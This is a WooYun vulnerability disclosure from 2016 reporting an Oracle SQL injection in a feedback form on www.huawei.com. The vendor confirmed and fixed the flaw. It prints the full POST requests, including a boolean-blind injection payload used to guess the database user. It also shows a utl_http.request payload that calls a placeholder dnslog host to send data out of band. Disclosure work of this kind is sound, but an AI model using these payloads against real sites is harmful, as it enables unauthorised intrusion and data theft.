当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169562

漏洞标题:www.huawei.com的一处Oracle注射

相关厂商:华为技术有限公司

漏洞作者: lijiejie

提交时间:2016-01-13 11:26

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-13: 细节已通知厂商并且等待厂商处理中
2016-01-15: 厂商已经确认,细节仅向厂商公开
2016-01-25: 细节向核心白帽子及相关领域专家公开
2016-02-04: 细节向普通白帽子公开
2016-02-14: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

www.huawei.com的一处Oracle注射

详细说明:

注射点:

POST /en/FeedBack HTTP/1.1
Host: www.huawei.com
Proxy-Connection: keep-alive
Content-Length: 162
Accept: */*
Origin: http://www.huawei.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.huawei.com/en/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: ASP.NET_SessionId=hupzqkr5o122wrlvuiy3qkmo; SC_ANALYTICS_GLOBAL_COOKIE=4b50e7b82e9041ffb780b270e401e1d9; SC_ANALYTICS_SESSION_COOKIE=AF78D9A9A3BF4E04B76D2DDAE215CC63|1|hupzqkr5o122wrlvuiy3qkmo; tma=92496004.78018484.1452490478559.1452490478559.1452490478559.1; tmd=1.92496004.78018484.1452490478559.; bfdid=b0605254007bf9520001766f0003017956933e84; ttc=1452737528403; s_ppv=100; cbg1#lang=en; _ga=GA1.2.1081421593.1452490472; s_depth=2; s_cc=true; s_sq=huawei-corporate-prd%252Chuawei-global-prd%3D%2526pid%253Dwww.huawei.com%25252Fen%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.huawei.com%25252Fen%25252F%252523%2526ot%253DA; s_fid=4BA49EB0CEEE9013-296CA0231EB6D47F; s_visit=1
gryw=%7B9CB31273-36CF-41C7-B431-0C0FC7F3C11D%7D&userid=admin&[email protected]' or 1=1 and substr(user,1,9)='WWWEXTEND§1§'--%20&gongsi=admin&tel=111&liuyan=thank+you


每一个参数都可以注入。 Oracle bool blind.

漏洞证明:

先试试最基本的,逐字符猜解,得到user:

user:   WWWEXTEND


试过utl_inaddr.get_host_address将数据打回cloudeye,但是失败了。
也试了下utl_http.request,打不出来。

gryw=%7B9CB31273-36CF-41C7-B431-0C0FC7F3C11D%7D&userid=admin&[email protected]' or 1=1 and length((select utl_http.request('http://xxxxxxx.dnslog.info/1.txt') from dual))=1--%20&gongsi=admin&tel=111&liuyan=thank+you


可能Oracle DB Server不能上网,在内网中,隔离了。

修复方案:

参数过滤

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2016-01-15 16:49

厂商回复:

感谢lijiejie对华为公司安全的关注,我们已经相关部门整改该漏洞。

最新状态:

暂无